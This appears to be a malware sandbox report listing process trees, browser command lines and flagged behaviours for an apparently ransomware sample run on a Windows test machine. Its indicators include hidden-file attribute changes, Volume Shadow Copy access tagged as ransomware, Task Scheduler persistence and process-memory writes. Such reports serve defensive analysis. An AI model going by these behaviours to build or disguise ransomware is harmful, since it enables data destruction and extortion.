3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
3316	PCHelpSoftDriverUpdater.exe
3316	PCHelpSoftDriverUpdater.exe
3316	PCHelpSoftDriverUpdater.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe

Suspicious use of SetWindowsHookEx 19 IoCs

Processes:

firefox.exemsedge.exefirefox.exe@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]

pid	process
2660	firefox.exe
4564	msedge.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
6256	firefox.exe
3380	@[email protected]
3380	@[email protected]
3064	@[email protected]
3064	@[email protected]
5420	@[email protected]
5420	@[email protected]
3484	@[email protected]
3076	@[email protected]
2148	@[email protected]
1148	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3408 wrote to memory of 3164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 3164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 6104	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 4028	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 4028	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe
PID 3408 wrote to memory of 5164	3408	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

1424 attrib.exe
1944 attrib.exe

pid	process
1424	attrib.exe
1944	attrib.exe

C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe
"C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:5304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffdd701cc40,0x7ffdd701cc4c,0x7ffdd701cc58
  2⤵
  PID:3164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:6104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2032 /prefetch:3
  2⤵
  PID:4028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1372,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2432 /prefetch:8
  2⤵
  PID:5164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3224 /prefetch:1
  2⤵
  PID:3200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:3160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4596,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4588 /prefetch:1
  2⤵
  PID:2800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4704 /prefetch:8
  2⤵
  PID:2520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4780,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3716 /prefetch:8
  2⤵
  PID:5752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4916,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4948 /prefetch:8
  2⤵
  PID:1664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4512,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4688 /prefetch:8
  2⤵
  PID:1152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5600,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4788 /prefetch:1
  2⤵
  PID:4040

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2036

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:6028
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2660
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2004 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1908 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95fb281a-306d-4ecb-b7fd-a8372fff67c9} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" gpu
    3⤵
    PID:5204
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2380 -prefMapHandle 2376 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5122532c-773f-49ec-912f-4eff135e7cf0} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" socket
    3⤵
    - Checks processor information in registry
    PID:5928
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2924 -childID 1 -isForBrowser -prefsHandle 2916 -prefMapHandle 2912 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49b84a38-2da0-4d57-a872-6b87e2caf06a} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
    3⤵
    PID:2620
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3952 -childID 2 -isForBrowser -prefsHandle 3944 -prefMapHandle 3940 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {893f0cb9-d884-45a7-bf1a-5edcde9425ff} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
    3⤵
    PID:5112
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4964 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4972 -prefMapHandle 4976 -prefsLen 29198 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1cf06d53-99e3-47e1-8134-413222996f26} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" utility
    3⤵
    - Checks processor information in registry
    PID:2184
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5224 -childID 3 -isForBrowser -prefsHandle 5212 -prefMapHandle 5132 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {30d9dbaf-dbfe-4b91-83a0-5c5f3165858d} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
    3⤵
    PID:5164
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5444 -childID 4 -isForBrowser -prefsHandle 5364 -prefMapHandle 5368 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83cecc9a-0a8c-4c16-81dd-794095eee9af} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
    3⤵
    PID:4272
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5568 -childID 5 -isForBrowser -prefsHandle 5644 -prefMapHandle 5640 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d142aeba-a805-4ef0-85f8-a20a77bc5ad9} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
    3⤵
    PID:5020
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6152 -childID 6 -isForBrowser -prefsHandle 6136 -prefMapHandle 6132 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27d27c1d-c058-4e00-88c2-d46abab6f359} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
    3⤵
    PID:1468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\ResizeGet.html
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ffdd6ed46f8,0x7ffdd6ed4708,0x7ffdd6ed4718
  2⤵
  PID:4524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
  2⤵
  PID:1600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
  2⤵
  PID:4340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
  2⤵
  PID:2060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
  2⤵
  PID:5548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
  2⤵
  PID:4292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
  2⤵
  PID:4784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
  2⤵
  PID:4496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
  2⤵
  PID:544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
  2⤵
  PID:4416
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6224 /prefetch:8
  2⤵
  PID:3156
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:3712
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x2c4,0x2c8,0x2cc,0x2a0,0x2d0,0x7ff7b26c5460,0x7ff7b26c5470,0x7ff7b26c5480
    3⤵
    PID:4232
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6224 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:5420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
  2⤵
  PID:6056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
  2⤵
  PID:1652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:1
  2⤵
  PID:3636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1900 /prefetch:1
  2⤵
  PID:4504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
  2⤵
  PID:2872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
  2⤵
  PID:1020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
